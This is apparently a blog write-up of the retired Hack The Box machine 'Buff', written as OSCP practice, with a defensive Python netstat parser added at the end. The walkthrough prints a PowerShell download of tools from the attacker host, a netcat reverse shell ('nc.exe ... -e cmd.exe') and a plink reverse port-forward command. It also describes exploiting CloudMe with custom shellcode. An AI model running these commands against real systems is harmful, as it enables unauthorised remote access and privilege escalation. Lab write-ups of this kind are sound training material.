Continuing on my road to OSCP certification, I am in the midst of preparation for the exam in January. Part of my preparation is to take on the retired machines available on the Hack The Box (HTB) platform. It is a great platform for practising and learning new penetration testing skills, as well as taking on the challenge of “capturing the flag” on their machines.
In this HTB series, I will be sharing my write-ups on all the retired machines that I have attempted and will attempt. If you are wondering, “How does he know which machines to do to prepare for OSCP?”, I am using TJnull's list of OSCP-like boxes in HTB, which can be found here
This box was pretty straightforward. The initial shell was easy to obtain because a public exploit was available, and it was just a matter of how we utilise it to obtain a user shell. The privilege escalation portion, however, was where I rabbit-holed a bit before finding a service listening locally that I could exploit, again with a public exploit. The interesting part about this is how I had to utilise a port forwarding technique to obtain a shell with Administrator privileges.
Recon Phase
To begin with this box, we first carry out our basic reconnaissance. For me, I used AutoRecon, which is developed and scripted by Tib3rius. It is one of the fundamental scans I make before moving on to more manual enumeration of specific ports or applications. From the full-port Nmap scan results produced by AutoRecon:
We see two ports open: 7680 and 8080. Port 8080 is Apache 2.4.43, probably serving a web application running on PHP 7.4.6. This is the port we want to start on.
Information Gathering
Browsing on the web browser:
We see a web page that seems to be about health and wellness. We also see a sign-in page for users.
On the Contact page, we see something quite interesting:
Here we see that the web page is built with Gym Management Software 1.0. If we google this software together with its version number, we immediately get a hit on a public exploit that we can utilise:
Grabbing the exploit after reading it on Exploit-DB:
We see that we obtained a web shell successfully! However, this shell is not the most stable (it is a bit funky), and we want a better foothold.
Setting up a Python server in the directory where nc.exe and wget.exe are located, we use PowerShell through the web shell to transfer wget.exe to the victim machine, then run wget.exe to grab nc.exe, and lastly use nc.exe to create a reverse shell from the victim machine back to the attacking machine. All this is done below:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3/wget.exe','C:\xampp\htdocs\gym\upload\wget.exe')"
wget.exe http://10.10.16.3/nc.exe
nc.exe -nv 10.10.16.3 4444 -e cmd.exe
On our listener, we obtain our initial shell, and from there we grab our user.txt:
Privilege Escalation
Information Gathering
Transferring our enumeration batch file over after setting up a Python HTTP server in the directory where winPEAS.bat is located:
After running winPEAS.bat, we notice something interesting among the ports currently listening on this machine:
We also find an executable during manual enumeration of the user's folder:
When I did a bit of googling, I found a public exploit for the software CloudMe 1.11.2, which seems to match the executable that I found:
Using Searchsploit, I also found a similar exploit with a local implementation, which is what we need, since this port can only be accessed from within the machine. Grabbing that exploit:
Exploitation
We also need to replace the shellcode payload in the public exploit with our own before we can use it. We generate it with msfvenom, using a command similar to the one found in the commented section above the shellcode in the public exploit:
Modifying the public exploit to load our own shellcode payload:
Since this exploit can only be run locally and we do not have python3 on the server, we turn to a port forwarding technique that forwards traffic from a port on our attacking machine to the target port on the victim machine. This lets us execute the exploit locally on our attacking machine while its traffic is routed to the port where CloudMe is listening on the victim machine, port 8888.
plink64.exe -ssh -l hack -pw hack -N -R 10.10.16.3:8001:127.0.0.1:8888 10.10.16.3
After running the command above, we verify that the port forwarding is successful:
Then running the CloudMe executable to start the service on port 8888:
Then running the exploit:
Then on our listener:
We managed to get a shell as Administrator! Then grabbing our root.txt flag:
Learning Points
The main learning point for me here, playing the offensive role, was the port forwarding. I had to recall how to do it and, furthermore, understand how it works. I would not say that I have it 100% down, but I understand why we need to master port forwarding to pivot or to reach local ports. This was a good machine to put that into practice.
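From the defender's side, the mechanics of that pivot are exactly what make it visible on the host: the vulnerable service is bound to loopback only, and the reverse forward rides on an outbound SSH session from the tunnelling tool. The Python below is an added example, not part of this write-up; its netstat -ano output and process names are constructed to mirror this box (the victim address 10.0.0.5 and the PIDs are placeholders), and it pulls out both indicators.

```python
# Added example (not part of the original write-up): the host-side view of the pivot.
from collections import namedtuple

# Constructed netstat -ano output mirroring this box: 7680/8080 exposed, CloudMe on
# loopback-only 8888, and an outbound SSH session carrying plink's -R tunnel.
# The victim address 10.0.0.5 and all PIDs are placeholders.
NETSTAT_SAMPLE = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       2840
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       6160
  TCP    [::1]:8888             [::]:0                 LISTENING       6160
  TCP    10.0.0.5:49715         10.10.16.3:22          ESTABLISHED     7132
  UDP    0.0.0.0:5355           *:*                                    1296
"""

# Constructed PID -> image name map (what tasklist would give you on the host).
PROCESS_NAMES = {4: "System", 2840: "httpd.exe", 6160: "CloudMe.exe", 7132: "plink64.exe"}

Conn = namedtuple("Conn", "laddr lport raddr rport state pid")

def parse_netstat(text):
    """Parse the TCP rows of Windows `netstat -ano`; UDP rows have no State column and are skipped."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":
            continue
        laddr, lport = parts[1].rsplit(":", 1)   # rsplit keeps "[::1]" intact
        raddr, rport = parts[2].rsplit(":", 1)
        conns.append(Conn(laddr, int(lport), raddr, int(rport), parts[3], int(parts[4])))
    return conns

def _is_loopback(addr):
    return addr.startswith("127.") or addr == "[::1]"

def loopback_listeners(conns):
    """Listeners bound to loopback: invisible to an external port scan, yet reachable by
    anyone with a foothold on the box, directly or through a tunnel."""
    return sorted({(c.lport, PROCESS_NAMES.get(c.pid, "?")) for c in conns
                   if c.state == "LISTENING" and _is_loopback(c.laddr)})

def unexpected_ssh_clients(conns, allowed=("ssh.exe",)):
    """Established outbound SSH sessions from a process that is not an approved client;
    a plink -R reverse forward needs exactly such a session, so this is where it shows."""
    return sorted({(PROCESS_NAMES.get(c.pid, "?"), c.raddr) for c in conns
                   if c.state == "ESTABLISHED" and c.rport == 22
                   and PROCESS_NAMES.get(c.pid) not in allowed})
```

Running both checks over the sample flags CloudMe.exe on 8888 and the plink64.exe session to 10.10.16.3; on a real host you would feed in live netstat and tasklist output instead of the constructed strings.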
Thank you for reading! As always, if you enjoy these write-ups, subscribe to my publications or follow me on Twitter @lojomojo96 and hit me up with a DM! It will really encourage me to keep writing and sharing as I prepare for my OSCP certification. Of course, if there are points to improve in my methodology, do let me know too! You can also find me on LinkedIn as well!